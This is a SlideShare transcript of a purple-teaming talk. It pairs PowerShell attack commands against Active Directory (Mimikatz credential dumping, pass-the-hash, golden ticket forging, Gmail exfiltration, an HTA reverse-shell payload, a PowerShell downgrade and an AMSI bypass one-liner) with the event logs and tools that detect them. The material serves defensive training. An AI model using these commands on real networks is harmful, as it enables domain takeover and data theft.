Nikhil Mittal, profile picture
Uploaded byNikhil Mittal
PPTX, PDF5,646 views

PowerShell for Practical Purple Teaming

The document discusses purple teaming, which involves red and blue teams working together to improve security. It provides two examples using PowerShell to simulate insider threats and client-side attacks. The first story involves escalating privileges from a normal user to domain admin and creating a golden ticket. The second starts as a non-admin user using a client-side attack like an HTA when PowerShell is blocked. Detection methods like logs, Applocker, and network monitoring are also outlined. The document concludes purple teaming aims to maximize threat simulation benefits by bringing red and blue teams together.

Technology
Related topics:
Penetration-Testing

Embed presentation

Downloaded 249 times
PowerShell for Practical Purple Teaming Nikhil Mittal
Get-Host • Hacker, trainer and speaker. • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Creator of Kautilya and Nishang https://github.com/samratashok/ • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks – Defcon, BlackHat, CanSecWest, Shakacon, BruCON, Troopers, HITB, DeepSec, RSA China, PHDays, EuSecWest and more. 2Nikhil Mittal PowerShell for Practical Purple Teaming
Overview • Traditional Red Teaming • What is Purple Teaming? • Why Purple Teaming? • PowerShell • Story One – Insider Threat Simulation • Story Two – Client Side Attack • Purple Team with external Red Team Nikhil Mittal 3PowerShell for Practical Purple Teaming
Traditional Red Teaming Image Courtesy: http://www.dailymail.co.uk/sport/article-2570835/Sport-images-day-Our- picture-editors-picks-March-1.html Nikhil Mittal 4PowerShell for Practical Purple Teaming
Traditional Red Teaming • Focused on stealth – Many red teamers guard their tools and techniques from the blue team to avoid detection of custom tools. Similarly, many blue teamers avoid discussing their detection mechanisms with the red team. • Adversarial in nature – Result – Both Red and Blue teams live with assumptions and work as adversaries and thus, cannot test security controls effectively. • Red teamers generally do not have access to enterprise tools of blue teamers and blue teamers are often unaware of techniques of red teamers. Nikhil Mittal 5PowerShell for Practical Purple Teaming
What is Purple Teaming? Image Courtesy: http://wpmedia.thestarphoenix.com/2016/02/saskatoon-sask-february-27- 2016-0229-sports-boxing-matt-d3.jpeg Nikhil Mittal 6PowerShell for Practical Purple Teaming
What is Purple Teaming? • Red vs and Blue Team - Working together to improve the security posture of an organization. • Focus on assessing detection and response mechanisms (getting caught) and training of Red and Blue Teams (Chris Gates) Nikhil Mittal 7PowerShell for Practical Purple Teaming
Objectives/Advantages of Purple Teaming • Detection and Prevention (Proactive) vs Remediation (Reactive) • Attacks success – Training and improvement of Blue Team • Attacks failure – Improvement of Red Team • Red team gets to see the monitoring, detection and response mechanisms, Blue team gets to see the tools and techniques of red. Nikhil Mittal 8PowerShell for Practical Purple Teaming
PowerShell • Available by-default in all modern Windows OS. • Provides access to Registry, Filesystem, Windows API, COM, Event logs etc. in a Windows platform and Active Directory Environment. • Based on .Net framework and therefore, can be extended easily to include new functionality. Nikhil Mittal 9PowerShell for Practical Purple Teaming
Why PowerShell? • Red Team – Ability to execute attacks without touching disk. – Script based attacks which means hard to detect based on signatures. – Plenty of open source attacks tools and techniques available. – Capability to avoid or bypass detection mechanisms. Nikhil Mittal 10PowerShell for Practical Purple Teaming
Why PowerShell? • Blue Team – Ability to execute monitoring and detection scripts without installing agents. – PowerShell v5 is very good at logging traces of an attack. – Plenty of open source detection and response tools and techniques available. – Capability to constraint PowerShell. Nikhil Mittal 11PowerShell for Practical Purple Teaming
Why PowerShell? • Purple Team – Ability to demonstrate and detect real attacks easily. – Capability to execute and detect attacks at scale, thanks to PSRremoting. – Plenty of open source attack, detection and response tools and techniques available. Nikhil Mittal 12PowerShell for Practical Purple Teaming
Purple Team Story One 1. Start as a normal non-local admin domain user (Assume Breach) 2. Look for local admin access 3. Look for a DA token/password/hash/creds 4. Use the creds to get DA access 5. Create a Golden Ticket 6. Lateral Movement 7. Exfiltration Nikhil Mittal 13PowerShell for Practical Purple Teaming
Purple Team Story One • Assume Breach – Internal threat simulation “It is more likely that an organization has already been compromised, but just hasn’t discovered it yet.” Microsoft Cloud Red Teaming Paper: https://gallery.technet.mi crosoft.com/Cloud-Red- Teaming-b837392 Nikhil Mittal 14PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Local Admin Access – We already have normal domain user access – Too easy? :P – Hunt for local admin access - The current user can be a local admin on some other box in the domain. – Local privilege escalation Nikhil Mittal 15PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Local Admin Access – Hunt for those machines in the domain where current domain user is a local admin – PowerView! Find-LocalAdminAccess -Verbose Nikhil Mittal 16PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Local Admin Access – This activity generates Event 4624 (Successful Logon) and 4634 (Logoff) on all tested machines and Event 4672 (Admin Logon) on success. Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} - MaxEvents 1 | Format-List – Property * Nikhil Mittal 17PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Local Admin Access – Look for events on multiple machines Invoke-Command –ScriptBlock {Get- WinEvent -FilterHashtable @{Logname='Security';ID=4672} - MaxEvents 1} –Computername (listofservers) | Format-List – Property * – WMI classes Win32_NTLogEvent and Win32_NTEventLogFile Nikhil Mittal 18PowerShell for Practical Purple Teaming
Purple Team Story One • Dump credentials using the local admin access. Invoke-Mimikatz –Computername ops- terminalser Nikhil Mittal 19PowerShell for Practical Purple Teaming
Purple Team Story One • Dump credentials using the local admin access – No interesting logging, unless PowerShellv5 is installed and enhanced logging options configured. – Enabling Script block logging, Process Creation logging and System Wide Transcript allows to catch traces. – If not all, one of the measures above will help in tracing an attack. – See https://blogs.msdn.microsoft.com/powershell/2 015/06/09/powershell-the-blue-team/ Nikhil Mittal 20PowerShell for Practical Purple Teaming
Purple Team Story One • Dump credentials using the local admin access –In case of Invoke-Mimikatz execution on ops-terminalser, it is the system wide transcript which helps the most in detection. –This is because we are using PowerShell remoting to execute Mimikatz on the target box. Nikhil Mittal 21PowerShell for Practical Purple Teaming
Purple Team Story One • Dump credentials using the local admin access Nikhil Mittal 22PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Domain Admin Privileges – We can search the domain for machines where a Domain Admin (DA) token is available. – PowerView Invoke-UserHunter –Verbose Nikhil Mittal 23PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Domain Admin Privileges – Logs - Event 4624 (Successful Logon) and 4634 (Logoff) on all tested machines and Event 4672 (Admin Logon) on success Nikhil Mittal 24PowerShell for Practical Purple Teaming
Purple Team Story One • Look for Domain Admin Privileges – Detection with Microsoft ATA (Recon using SMB Session Enumeration) Nikhil Mittal 25PowerShell for Practical Purple Teaming
Purple Team Story One • Get DA Access Invoke-Mimikatz -ComputerName ops- file Invoke-Mimikatz -Command '"sekurlsa::pth /user:privservice /domain:offensiveps.com /ntlm:7851d4a63e8a624dfee39616c3774 c83 /run:powershell.exe"' Nikhil Mittal 26PowerShell for Practical Purple Teaming
Purple Team Story One • Get DA Access Nikhil Mittal 27PowerShell for Practical Purple Teaming
Purple Team Story One • Create Golden Ticket Invoke-Mimikatz -Command '"lsadump::lsa /patch"' –Computername ops-dc Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:offensiveps.com /sid:/sid:S-1- 5-21-325-3177237293-604223748 /krbtgt:5c1a7d30a872cac2b7a32e7857589d 97 /id:500 /groups:513 /ticket:krb_tkt.txt"' Nikhil Mittal 28PowerShell for Practical Purple Teaming
Purple Team Story One • Use Golden Ticket Invoke-Mimikatz -Command '"kerberos::ptt C:UserslabuserDesktopkrb_tkt.tx t'" – Same logs as for other lateral movement activities. – ATA detects Golden Ticket Nikhil Mittal 29PowerShell for Practical Purple Teaming
Purple Team Story One • Use Golden Ticket – ATA detects Golden Ticket Nikhil Mittal 30PowerShell for Practical Purple Teaming
Purple Team Story One • Exfiltration – Exfiltration of key components using Gmail (Below script from Nishang) Do-Exfiltration -Data "5c1a7d30a872cac2b7a32e7857589d97" -ExfilOption gmail -username psgcatlite -password powershellchabi9988 – Detection – HTTPS Interception Nikhil Mittal 31PowerShell for Practical Purple Teaming
Purple Team Story One • Exfiltration – Exfiltration of huge chunks of data – Gmail (Google Drive?), Pastebin, Github, DropBox – Detection – HTTPS Interception Nikhil Mittal 32PowerShell for Practical Purple Teaming
Purple Team Story Two • Start as a non-localadmin domain user - Client Side Attack when powershell.exe blocked with whitelisting • Use a ICMP/HTTPS shell? • Exfiltration Nikhil Mittal 33PowerShell for Practical Purple Teaming
Purple Team Story Two • Start as a normal non-localadmin domain user – Client Side Attack (powershell.exe blocked) – Check for multiple file extensions. HTA is my favorite. Nishang has a script for that Out-HTA -PayloadScript .Invoke- PowerShellTcpOneLine.ps1 Nikhil Mittal 34PowerShell for Practical Purple Teaming
Purple Team Story Two • Start as a normal non-local admin domain user – Process creation logs (Event 4688) – Applocker logs (Event 8002 – allowed - is logged for PowerShell when it is blocked and executed by something like mshta.exe) – PowerShell transcripts will log everything as well. In fact, even when using msbuild, transcript logs things. Nikhil Mittal 35PowerShell for Practical Purple Teaming
Purple Team Story Two • Start as a normal non-localadmin domain user – In case, ICMP/HTTPS/DNS (nishang) shells are used, detection at the network level becomes a bit harder. Make sure that these protocols are monitored as well. – Recommended read for DNS https://blogs.technet.microsoft.com/office365 security/dns-intrusion-detection-in-office- 365/ Nikhil Mittal 36PowerShell for Practical Purple Teaming
Random Powershell • PowerShell v2 does not offer enhanced logging and detection (AMSI) capabilities. Using v2 (executable or reference assemblies) for attacks is very useful. • Simply running PowerShell with –version parameter or C# executable with reference to older assemblies can be used powershell.exe –version 2 Nikhil Mittal 37PowerShell for Practical Purple Teaming
Random Powershell • Windows PowerShell log Event Id 400 contains Engine version which can be used for detection. Reference:http://www.leeholmes.com/blog/2017/03/17/detect ing-and-preventing-powershell-downgrade-attacks/ Nikhil Mittal 38PowerShell for Practical Purple Teaming
Random Powershell • If powershell.exe is blocked. .Net code can use System.Management.Automation NameSpace to load Powershell functionality. C:WindowsMicrosoft.NETFramew orkv4.0.30319>msbuild.exe pshell.xml Nikhil Mittal 39PowerShell for Practical Purple Teaming
Random Powershell • System wide transcript logs usage of the namespace Nikhil Mittal 40PowerShell for Practical Purple Teaming
Random Powershell • If PowerShell v5 is installed. AMSI can help in detection of scripts like PowerShell, VB, JScript from memory. • Even if you load the scripts completely from memory (download cradle, encodedcommand etc.) Nikhil Mittal 41PowerShell for Practical Purple Teaming
Random Powershell • AMSI can be unloaded using methods like: amsi.dll hijack (p0wnedshell) [Ref].Assembly.GetType('System.Management .Automation.AmsiUtils').GetField('amsiIni tFailed','NonPublic,Static').SetValue($nu ll,$true) - by Matt Graeber - Event ID 4104 (Microsoft-Windows-PowerShell/Operational) – Suspicious script block logging Nikhil Mittal 42PowerShell for Practical Purple Teaming
Purple Team with external red team • Most Purple team models suggest an internal red team, for some very valid reasons – like adversarial approach and not sharing techniques. • But, external red component of a Purple team brings new perspective, techniques and methodologies. You just need right team structure and terms. Nikhil Mittal 43PowerShell for Practical Purple Teaming
Resources/References • Chris Gates – Going Purple http://carnal0wnage.attackresearch.com/2016/01/purple- teaming-lessons-learned-ruxcon.html • Chris Gates and Haydn Johnson https://www.slideshare.net/chrisgates/purple-teaming-the- cyber-kill-chain-practical-exercises-for-everyone-sector-2016 • Jorge Orchilles https://tacticaledge.co/presos/Jorge%20Orchilles%20- %20Purple%20Team%20- %20Evolving%20Red%20vs%20Blue%20- %20Tactical%20Edge.pdf Nikhil Mittal 44PowerShell for Practical Purple Teaming
Conclusion • Purple team aims to bring Red and Blue together to maximize the benefits of threat simulation. • It doesn’t mean an end to red teaming – both have different goals. • Structural and work culture changes required to create an effective purple team. Nikhil Mittal 45PowerShell for Practical Purple Teaming
Thank You • Thanks x33fcon! • Please provide feedback. • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 46Nikhil Mittal PowerShell for Practical Purple Teaming

More Related Content

PDF
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
byJorge Orchilles
 
PPTX
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
PDF
Adversary Emulation Workshop
byprithaaash
 
PDF
Windows Threat Hunting
byGIBIN JOHN
 
PDF
Mapping ATT&CK Techniques to ENGAGE Activities
byMITRE ATT&CK
 
PDF
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
PDF
Windows attacks - AT is the new black
byChris Gates
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
byJorge Orchilles
 
Bsides 2019 - Intelligent Threat Hunting
byDhruv Majumdar
 
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
Adversary Emulation Workshop
byprithaaash
 
Windows Threat Hunting
byGIBIN JOHN
 
Mapping ATT&CK Techniques to ENGAGE Activities
byMITRE ATT&CK
 
No Easy Breach DerbyCon 2016
byMatthew Dunwoody
 
Windows attacks - AT is the new black
byChris Gates
 

What's hot

PDF
Hunting Lateral Movement in Windows Infrastructure
bySergey Soldatov
 
PDF
A Threat Hunter Himself
bySergey Soldatov
 
PDF
Purple Team Exercise Framework Workshop #PTEF
byJorge Orchilles
 
PDF
ATT&CKing the Red/Blue Divide
byMITRE ATT&CK
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PPTX
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
byDenim Group
 
PDF
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
PPTX
Purple Teaming with ATT&CK - x33fcon 2018
byChristopher Korban
 
PDF
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
PDF
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
PPTX
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
byNikhil Mittal
 
PDF
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
byChris Gates
 
PDF
Threat Modelling - It's not just for developers
byMITRE ATT&CK
 
PDF
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
PDF
Red Team Framework
by👀 Joe Gray
 
PPTX
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
PDF
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
PPTX
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
PPTX
The Elastic Stack as a SIEM
byJohn Hubbard
 
PDF
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
byMITRE - ATT&CKcon
 
Hunting Lateral Movement in Windows Infrastructure
bySergey Soldatov
 
A Threat Hunter Himself
bySergey Soldatov
 
Purple Team Exercise Framework Workshop #PTEF
byJorge Orchilles
 
ATT&CKing the Red/Blue Divide
byMITRE ATT&CK
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
Cyber Purple Teaming: Uniting Blue and Red Teams - B Sides San Antonio - Albe...
byDenim Group
 
Hunting for Privilege Escalation in Windows Environment
byTeymur Kheirkhabarov
 
Purple Teaming with ATT&CK - x33fcon 2018
byChristopher Korban
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
Fantastic Red Team Attacks and How to Find Them
byRoss Wolf
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
byNikhil Mittal
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
byChris Gates
 
Threat Modelling - It's not just for developers
byMITRE ATT&CK
 
Hunting for Credentials Dumping in Windows Environment
byTeymur Kheirkhabarov
 
Red Team Framework
by👀 Joe Gray
 
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
How to Hunt for Lateral Movement on Your Network
bySqrrl
 
Adversary Emulation using CALDERA
byErik Van Buggenhout
 
The Elastic Stack as a SIEM
byJohn Hubbard
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
byMITRE - ATT&CKcon
 

Similar to PowerShell for Practical Purple Teaming

PDF
Decoding the Art of Red Teaming - OWASP Seasides
byOWASPSeasides
 
PDF
Purple Team - Offensive and Defensive collaborative simulation
byAdam Nurudini
 
PDF
Purple View
byHaydn Johnson
 
PDF
Purple View
byHaydn Johnson
 
PPTX
FUEL_USERS_GROUP
byWill Pearce
 
PPTX
Bridging the Gap
byWill Schroeder
 
PPTX
Security War Games
bySeniorStoryteller
 
PPTX
Purple Teaming - The Collaborative Future of Penetration Testing
byFRSecure
 
PPTX
Bridging the Gap: Lessons in Adversarial Tradecraft
byenigma0x3
 
PPTX
Vulnerability Paralysis ISSA Charleston
byChris Nickerson
 
PPTX
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
bybeltface
 
PDF
Purple Teaming With Adversary Emulation.pdf
byprithaaash
 
PDF
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
byMauricio Velazco
 
PDF
Purple teaming Cyber Kill Chain
byHaydn Johnson
 
PPTX
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
PPTX
PowerShell for Cyber Warriors - Bsides Knoxville 2016
byRussel Van Tuyl
 
PDF
UOIT Purple Team - Student Edition 2017
byHaydn Johnson
 
PPTX
BSides SG Practical Red Teaming Workshop
byAjay Choudhary
 
PPTX
Network Security - Real and Present Dangers
byPeter Wood
 
PDF
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
byShah Sheikh
 
Decoding the Art of Red Teaming - OWASP Seasides
byOWASPSeasides
 
Purple Team - Offensive and Defensive collaborative simulation
byAdam Nurudini
 
Purple View
byHaydn Johnson
 
Purple View
byHaydn Johnson
 
FUEL_USERS_GROUP
byWill Pearce
 
Bridging the Gap
byWill Schroeder
 
Security War Games
bySeniorStoryteller
 
Purple Teaming - The Collaborative Future of Penetration Testing
byFRSecure
 
Bridging the Gap: Lessons in Adversarial Tradecraft
byenigma0x3
 
Vulnerability Paralysis ISSA Charleston
byChris Nickerson
 
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
bybeltface
 
Purple Teaming With Adversary Emulation.pdf
byprithaaash
 
Bsides Baltimore 2019: Embrace the Red Enhancing detection capabilities with ...
byMauricio Velazco
 
Purple teaming Cyber Kill Chain
byHaydn Johnson
 
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
byRussel Van Tuyl
 
UOIT Purple Team - Student Edition 2017
byHaydn Johnson
 
BSides SG Practical Red Teaming Workshop
byAjay Choudhary
 
Network Security - Real and Present Dangers
byPeter Wood
 
Cyber Security 101 - Back to Basics (HP Secure Print Event 2018)
byShah Sheikh
 

More from Nikhil Mittal

PDF
0wn-premises: Bypassing Microsoft Defender for Identity
byNikhil Mittal
 
PPTX
RACE - Minimal Rights and ACE for Active Directory Dominance
byNikhil Mittal
 
PPTX
Forging Trusts for Deception in Active Directory
byNikhil Mittal
 
PPTX
Red Team Revenge - Attacking Microsoft ATA
byNikhil Mittal
 
PPTX
Hacked? Pray that the Attacker used PowerShell
byNikhil Mittal
 
PPTX
Evading Microsoft ATA for Active Directory Domination
byNikhil Mittal
 
PPTX
Workshop: PowerShell for Penetration Testers
byNikhil Mittal
 
PDF
Continuous intrusion: Why CI tools are an attacker’s best friends
byNikhil Mittal
 
PPTX
Client side attacks using PowerShell
byNikhil Mittal
 
PPTX
Powerpreter: Post Exploitation like a Boss
byNikhil Mittal
 
PPTX
PowerShell for Penetration Testers
byNikhil Mittal
 
PPTX
Kautilya: Teensy beyond shell
byNikhil Mittal
 
PPTX
Teensy Programming for Everyone
byNikhil Mittal
 
PPTX
More fun using Kautilya
byNikhil Mittal
 
PPTX
Hacking the future with USB HID
byNikhil Mittal
 
PPTX
Owning windows 8 with human interface devices
byNikhil Mittal
 
0wn-premises: Bypassing Microsoft Defender for Identity
byNikhil Mittal
 
RACE - Minimal Rights and ACE for Active Directory Dominance
byNikhil Mittal
 
Forging Trusts for Deception in Active Directory
byNikhil Mittal
 
Red Team Revenge - Attacking Microsoft ATA
byNikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
byNikhil Mittal
 
Evading Microsoft ATA for Active Directory Domination
byNikhil Mittal
 
Workshop: PowerShell for Penetration Testers
byNikhil Mittal
 
Continuous intrusion: Why CI tools are an attacker’s best friends
byNikhil Mittal
 
Client side attacks using PowerShell
byNikhil Mittal
 
Powerpreter: Post Exploitation like a Boss
byNikhil Mittal
 
PowerShell for Penetration Testers
byNikhil Mittal
 
Kautilya: Teensy beyond shell
byNikhil Mittal
 
Teensy Programming for Everyone
byNikhil Mittal
 
More fun using Kautilya
byNikhil Mittal
 
Hacking the future with USB HID
byNikhil Mittal
 
Owning windows 8 with human interface devices
byNikhil Mittal
 

Recently uploaded

PDF
Enterprise Data Services_ A Development Guide with Use Cases, Trends and Impl...
by2601harsh23
 
PDF
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
PPTX
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
PDF
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
PDF
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
PDF
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
PDF
Certified AI-Empowered SAFe Release Train Engineer.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
PDF
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
PPTX
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
PDF
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
PDF
Bettersize | BeSEC Series Product Brochure
byBettersize Instruments
 
PDF
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
PDF
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
PDF
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
PPTX
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
PDF
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
PDF
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
PPTX
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
PDF
Real-Time AI Masterclass: Vector Search at Scale
byScyllaDB
 
PDF
Real-Time AI at Scale Masterclass - Challenges of AI at Scale
byScyllaDB
 
Enterprise Data Services_ A Development Guide with Use Cases, Trends and Impl...
by2601harsh23
 
Parental Control App for Phones_ The Complete 2026 Guide for Safer, Smarter P...
byRyan Cooper
 
INSY_7213_Theme Sessions 47 & 48 Advanced databases.pptx
bystormzy56
 
Quick Learn Laravel for Beginner from Zero to Survive
byiDev Semarang
 
AI-Powered Alert Analysis with ClickHouse - DB Mastery Jan'26
byAlkin Tezuysal
 
JCB_3CX_SPECS (24 págs) companywrench.com .pdf
byAquilesOyarzn1
 
Certified AI-Empowered SAFe Release Train Engineer.pdf
byMarc Entsminger SPC6, RTE, SSM, SA, SDP
 
"Painless Major Upgrade: A Strategy for Updating Large Codebases", Andrii Yat...
byFwdays
 
2026 SCORM Troubleshooting Rustici + dominKnow.pptx
byRustici Software
 
Afsar Ahmed - Digital Marketing Portfolio
byAfsar Ahmed
 
Bettersize | BeSEC Series Product Brochure
byBettersize Instruments
 
When Drones Decide for Themselves_ Inside the Rise of Machine-Led Flight.pdf
byLyra Anderson
 
What Thema can do: Leveraging metadata to support the discoverability of Firs...
byBookNet Canada
 
Peculiar Findings Around CEX Activity and ETH Price
bytobbymnbvcxz
 
TechSprint WinterHack — Top 10 Teams Pitching Session we are excited for pit...
bybajpaitusharoffon678
 
React Mastery: Visual Mental Models to Understand React Deeply
byThomas Gaye
 
The Enterprise Web3 Landscape - a view from Kaleido based on the past 10 year...
byPeter Broadhurst
 
Spacecraft Guidance Quick Research Guide by Arthur Morgan
byArthur Morgan
 
Real-Time AI Masterclass: Vector Search at Scale
byScyllaDB
 
Real-Time AI at Scale Masterclass - Challenges of AI at Scale
byScyllaDB
 

PowerShell for Practical Purple Teaming

  • 1.
  • 2.
    Get-Host • Hacker, trainerand speaker. • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Creator of Kautilya and Nishang https://github.com/samratashok/ • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks – Defcon, BlackHat, CanSecWest, Shakacon, BruCON, Troopers, HITB, DeepSec, RSA China, PHDays, EuSecWest and more. 2Nikhil Mittal PowerShell for Practical Purple Teaming
  • 3.
    Overview • Traditional RedTeaming • What is Purple Teaming? • Why Purple Teaming? • PowerShell • Story One – Insider Threat Simulation • Story Two – Client Side Attack • Purple Team with external Red Team Nikhil Mittal 3PowerShell for Practical Purple Teaming
  • 4.
    Traditional Red Teaming ImageCourtesy: http://www.dailymail.co.uk/sport/article-2570835/Sport-images-day-Our- picture-editors-picks-March-1.html Nikhil Mittal 4PowerShell for Practical Purple Teaming
  • 5.
    Traditional Red Teaming •Focused on stealth – Many red teamers guard their tools and techniques from the blue team to avoid detection of custom tools. Similarly, many blue teamers avoid discussing their detection mechanisms with the red team. • Adversarial in nature – Result – Both Red and Blue teams live with assumptions and work as adversaries and thus, cannot test security controls effectively. • Red teamers generally do not have access to enterprise tools of blue teamers and blue teamers are often unaware of techniques of red teamers. Nikhil Mittal 5PowerShell for Practical Purple Teaming
  • 6.
    What is PurpleTeaming? Image Courtesy: http://wpmedia.thestarphoenix.com/2016/02/saskatoon-sask-february-27- 2016-0229-sports-boxing-matt-d3.jpeg Nikhil Mittal 6PowerShell for Practical Purple Teaming
  • 7.
    What is PurpleTeaming? • Red vs and Blue Team - Working together to improve the security posture of an organization. • Focus on assessing detection and response mechanisms (getting caught) and training of Red and Blue Teams (Chris Gates) Nikhil Mittal 7PowerShell for Practical Purple Teaming
  • 8.
    Objectives/Advantages of Purple Teaming •Detection and Prevention (Proactive) vs Remediation (Reactive) • Attacks success – Training and improvement of Blue Team • Attacks failure – Improvement of Red Team • Red team gets to see the monitoring, detection and response mechanisms, Blue team gets to see the tools and techniques of red. Nikhil Mittal 8PowerShell for Practical Purple Teaming
  • 9.
    PowerShell • Available by-defaultin all modern Windows OS. • Provides access to Registry, Filesystem, Windows API, COM, Event logs etc. in a Windows platform and Active Directory Environment. • Based on .Net framework and therefore, can be extended easily to include new functionality. Nikhil Mittal 9PowerShell for Practical Purple Teaming
  • 10.
    Why PowerShell? • RedTeam – Ability to execute attacks without touching disk. – Script based attacks which means hard to detect based on signatures. – Plenty of open source attacks tools and techniques available. – Capability to avoid or bypass detection mechanisms. Nikhil Mittal 10PowerShell for Practical Purple Teaming
  • 11.
    Why PowerShell? • BlueTeam – Ability to execute monitoring and detection scripts without installing agents. – PowerShell v5 is very good at logging traces of an attack. – Plenty of open source detection and response tools and techniques available. – Capability to constraint PowerShell. Nikhil Mittal 11PowerShell for Practical Purple Teaming
  • 12.
    Why PowerShell? • PurpleTeam – Ability to demonstrate and detect real attacks easily. – Capability to execute and detect attacks at scale, thanks to PSRremoting. – Plenty of open source attack, detection and response tools and techniques available. Nikhil Mittal 12PowerShell for Practical Purple Teaming
  • 13.
    Purple Team StoryOne 1. Start as a normal non-local admin domain user (Assume Breach) 2. Look for local admin access 3. Look for a DA token/password/hash/creds 4. Use the creds to get DA access 5. Create a Golden Ticket 6. Lateral Movement 7. Exfiltration Nikhil Mittal 13PowerShell for Practical Purple Teaming
  • 14.
    Purple Team StoryOne • Assume Breach – Internal threat simulation “It is more likely that an organization has already been compromised, but just hasn’t discovered it yet.” Microsoft Cloud Red Teaming Paper: https://gallery.technet.mi crosoft.com/Cloud-Red- Teaming-b837392 Nikhil Mittal 14PowerShell for Practical Purple Teaming
  • 15.
    Purple Team StoryOne • Look for Local Admin Access – We already have normal domain user access – Too easy? :P – Hunt for local admin access - The current user can be a local admin on some other box in the domain. – Local privilege escalation Nikhil Mittal 15PowerShell for Practical Purple Teaming
  • 16.
    Purple Team StoryOne • Look for Local Admin Access – Hunt for those machines in the domain where current domain user is a local admin – PowerView! Find-LocalAdminAccess -Verbose Nikhil Mittal 16PowerShell for Practical Purple Teaming
  • 17.
    Purple Team StoryOne • Look for Local Admin Access – This activity generates Event 4624 (Successful Logon) and 4634 (Logoff) on all tested machines and Event 4672 (Admin Logon) on success. Get-WinEvent -FilterHashtable @{Logname='Security';ID=4672} - MaxEvents 1 | Format-List – Property * Nikhil Mittal 17PowerShell for Practical Purple Teaming
  • 18.
    Purple Team StoryOne • Look for Local Admin Access – Look for events on multiple machines Invoke-Command –ScriptBlock {Get- WinEvent -FilterHashtable @{Logname='Security';ID=4672} - MaxEvents 1} –Computername (listofservers) | Format-List – Property * – WMI classes Win32_NTLogEvent and Win32_NTEventLogFile Nikhil Mittal 18PowerShell for Practical Purple Teaming
  • 19.
    Purple Team StoryOne • Dump credentials using the local admin access. Invoke-Mimikatz –Computername ops- terminalser Nikhil Mittal 19PowerShell for Practical Purple Teaming
  • 20.
    Purple Team StoryOne • Dump credentials using the local admin access – No interesting logging, unless PowerShellv5 is installed and enhanced logging options configured. – Enabling Script block logging, Process Creation logging and System Wide Transcript allows to catch traces. – If not all, one of the measures above will help in tracing an attack. – See https://blogs.msdn.microsoft.com/powershell/2 015/06/09/powershell-the-blue-team/ Nikhil Mittal 20PowerShell for Practical Purple Teaming
  • 21.
    Purple Team StoryOne • Dump credentials using the local admin access –In case of Invoke-Mimikatz execution on ops-terminalser, it is the system wide transcript which helps the most in detection. –This is because we are using PowerShell remoting to execute Mimikatz on the target box. Nikhil Mittal 21PowerShell for Practical Purple Teaming
  • 22.
